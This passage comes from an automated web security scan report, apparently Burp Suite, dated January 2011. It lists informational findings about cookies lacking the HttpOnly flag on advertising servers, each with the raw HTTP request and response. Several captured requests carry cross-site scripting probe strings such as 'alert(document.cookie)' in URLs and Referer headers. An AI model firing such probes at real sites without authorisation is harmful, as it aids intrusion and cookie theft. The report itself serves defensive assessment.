Confidence:	Certain
Host:	http://ads.dailystar.com.lb
Path:	/www/delivery/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 22:29:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ck.php HTTP/1.1
Host: ads.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: OAID=69cbb92020bcada4c658c1886472c417;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:29:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 22:29:37 GMT; path=/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

14.197. http://ads.dailystar.com.lb/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.dailystar.com.lb
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 21:11:41 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=409&campaignid=194&zoneid=45&loc=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&cb=cb57b3cbbe HTTP/1.1
Host: ads.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://ads.dailystar.com.lb/www/delivery/afr.php?zoneid=45&cb=456
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=69cbb92020bcada4c658c1886472c417

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 21:11:41 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.198. http://ads.doclix.com/adserver/CntImprImg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/adserver/CntImprImg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
weekly_freq_cap=WzUtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
monthly_freq_cap=WzEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.199. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PRvt=CEJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmqG8ONudAI5BCe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRimp=A19A0400-38BC-9DDB-0309-05A002390102; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRca=|AJcC*23172:1|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcp=|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpl=|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcr=|Fy9A:1|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpc=|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.200. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_us_1000000=pUMd5U+DfxIU7WxyqNQb+zH1s17HozKcX9zb1nGBmx1V/jUVnfeldtQjURXj62Ij5rwYZ9wJ1NqZFDtPnA/ai2kzB4ZWck4RlBED9tHPfALbjG5/h+EbQvknzyyRcrItMoJol6PXNTl/OKv1HLyRjqxPdUMPuhTeFrZcyO8gAu7DnkKRicwv26rJbnB2YkIMVwnyQe25v0bF8cRbuIDVa248qh0eMMOfyR/FXEsxPsbCZDweM7dbepZIWR3dtd+dVimkWAYQoZALNR+V/guGHuxfyVd2gEOLAGwOQllMhFXpg30hoPoVfJhXFUqiQNm3BzjM0qe3oej3+PsACj2CU61hVKeF2HNY9k2ol1ixdYUyhZXc+csbq2QEngScG8Fyk28f3CtFfcgafRot2T5UJdsjwU///O8q5QLpNWARM1w/lHLi6xhWyV7RPg2RTuUehxIA5X1CDzhakTy4gchBqLYpsImsUgwLdediq5xOCZUg5jzSYFUo7zRvJUElYuphp8OzQ1AQryrdIBXfr2Q7k0pOTQtw0Sya6irERSdIDFN9xHQEpu/KZi/VfFED67ADmmemfMMNlbnugnmTr6LTfKuLWuw4QB8ULOl4ICmXLj6pBD/5tNcSMJWTFHOixo4IK0vkutnkoKUs/dGDMVzfYfICMrfqYm5ooaMqvnmJ2DAzQJTYRF4vDA6NPTQcbJifGlogyZA5q8lXRY25R+s5rcSx1LACJzBJtIrHnrtl8SXouSQzf3kTOxNhVDItJBmmUFdwuBsLv9W3DOHJYpGPu7/HeVRht67vcq4vWMq3VbvT2WCZWCAVmSFQIlAkZlXJXT993g==; Domain=.revsci.net; Expires=Fri, 16-Jan-2043 21:06:44 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.201. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAX=rcHW8009oaoAAx1V; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.traderonline.com
NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.202. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1914196089@Right1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1914196089@Right1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1914196089@Right1? HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.1.10.1295884751; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 489
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1129050465/Right1/TOLMedia/House-TOL-Sky/pwctol-120x600-new.jpg/72634857383030396
...[SNIP]...

14.203. http://adserver.adtechus.com/bind previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/bind

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

autotrdr_exclude=autotrdr_exclude;expires=Thu, 24 Feb 2011 2:19:49 GMT;domain=adserver.adtechus.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bind?ckey1=autotrdr_exclude;cvalue1=autotrdr_exclude;expiresDays=30;adct=text/html;misc=123 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=9811137525830.418?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: text/html
Content-Length: 1
Set-Cookie: autotrdr_exclude=autotrdr_exclude;expires=Thu, 24 Feb 2011 2:19:49 GMT;domain=adserver.adtechus.com;path=/

14.204. http://adserver.teracent.net/tase/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

14.205. http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp/vew previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/redir/1295921988188_58040565_as2108_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imp=a$le#1295921992907_58231589_as2103_vew|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:52 GMT; Path=/tase

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.206. http://adserving.autotrader.com/js.ng/adsize=1x1&site=ntl&page=homepagegeosplash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserving.autotrader.com
Path:	/js.ng/adsize=1x1&site=ntl&page=homepagegeosplash

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServeradserving=596041738.42015.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/adsize=1x1&site=ntl&page=homepagegeosplash?v=3.17.167500 HTTP/1.1
Host: adserving.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=ae08625-18449-1404707754-12; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; ATC_USER_ZIP=

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:40 GMT
Server: Apache
AdServer: padsrv7002:9678:1
Cache-Control: max-age=0
Expires: Tue, 25 Jan 2011 02:19:40 GMT
Content-Length: 34
Connection: close
Content-Type: application/x-javascript
Set-Cookie: BIGipServeradserving=596041738.42015.0000; path=/

document.write('\n<html></html>');

14.207. https://adwords.google.com/select/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/select/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AdsUserLocale=en_US; Expires=Wed, 23-Feb-2011 15:01:47 GMT; Path=/; Secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /select/Login?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en_US; Expires=Wed, 23-Feb-2011 15:01:47 GMT; Path=/; Secure
Set-Cookie: adwordsReferralSource=sourceid=awo&subid=us-en-et-symh&clickid=; Expires=Sun, 24-Apr-2011 15:01:47 GMT; Path=/; Secure; HttpOnly
Set-Cookie: I=FvymuC0BAAA=.9QCH/JbBItRG1yn60m2UCA==.pkBCW7TbpeIa9TooG/zDig==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=MnC9rKHGAj-MXXNt189FAg:awfe-efe=MnC9rKHGAj-MXXNt189FAg; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=OxzFPu9nM34AJjjsCC43vQ; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en
Date: Mon, 24 Jan 2011 15:01:47 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin?sourceid=awo&subid=us-en
...[SNIP]...

14.208. http://affiliate.kickapps.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://affiliate.kickapps.com
Path:	/crossdomain.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerapp_server_pool=1739565248.47135.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /crossdomain.xml HTTP/1.1
Host: affiliate.kickapps.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"274-1295596907000"
Last-Modified: Fri, 21 Jan 2011 08:01:47 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 274
Date: Tue, 25 Jan 2011 02:23:03 GMT
Set-Cookie: BIGipServerapp_server_pool=1739565248.47135.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-
...[SNIP]...

14.209. http://ak1.abmr.net/is/r1-ads.ace.advertising.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/r1-ads.ace.advertising.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-E74B5E0BA5732C35BC52F42A6AAFD162E9E3C651AE0BE96BFC6B936C6BF32537-9E7777269A9BB1AAE2C4010D7B5CF320CCEC2B7369606790ED15668E1191BC18; expires=Tue, 24-Jan-2012 21:08:39 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.210. http://as1.whdh.com/pan/adlog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as1.whdh.com
Path:	/pan/adlog.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

phpAds_blockAd[1418]=1295949266; expires=Tue, 25-Jan-2011 21:54:26 GMT; path=/
phpAds_geoInfo=%7C%7C%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7Cgeoip; expires=Mon, 24-Jan-2011 22:09:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pan/adlog.php?bannerid=1418&clientid=1050&zoneid=3&source=&block=43200&capping=0&cb=7ae9a84863205189b51a67916c7ad5c6 HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpAds_geoInfo=%7C%7C%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7Cgeoip

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:54:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906066227275; path=/
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: phpAds_blockAd[1418]=1295949266; expires=Tue, 25-Jan-2011 21:54:26 GMT; path=/
Set-Cookie: phpAds_geoInfo=%7C%7C%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7Cgeoip; expires=Mon, 24-Jan-2011 22:09:26 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.211. http://as2.whdh.com/m/m.php/1295906131129/m.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as2.whdh.com
Path:	/m/m.php/1295906131129/m.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; expires=Sun, 24-Apr-2011 21:54:26 GMT; path=/; domain=.whdh.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.212. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UA=AAAAAQAU5FRWDkay5gNIBniL3nCP0n0K9AIDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHzthBoYmBgYZugzMjAyMLDkMPEzCQAZjLq7zn9zgqgBAClnGck-; Domain=.amgdgt.com; Expires=Thu, 24-Feb-2011 01:35:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.213. http://autotrader.dealix.com/step1.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://autotrader.dealix.com
Path:	/step1.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CkSE=1%2F24%2F2011+7%3A32%3A46+AM; path=/
CkSN=21028798455; path=/
CkUN=21028798455; expires=Thu, 21-Jan-2021 08:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /step1.asp HTTP/1.1
Host: autotrader.dealix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 15:02:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12107
Content-Type: text/html
Set-Cookie: CkSE=1%2F24%2F2011+7%3A32%3A46+AM; path=/
Set-Cookie: CkSN=21028798455; path=/
Set-Cookie: CkUN=21028798455; expires=Thu, 21-Jan-2021 08:00:00 GMT; path=/
Cache-control: private



<html>
<head>

<title>Car Buying Service: New Car Buying Made Easy - Buy a car online at InvoiceDealers</title>
<meta name="description" content="InvoiceDe
...[SNIP]...

14.214. http://b.collective-media.net/seg/cm/de18_1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/seg/cm/de18_1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cli=11ddec103f853dc; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 02:27:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.215. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 22:20:55 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.216. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 15:58:37 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.217. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 508
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
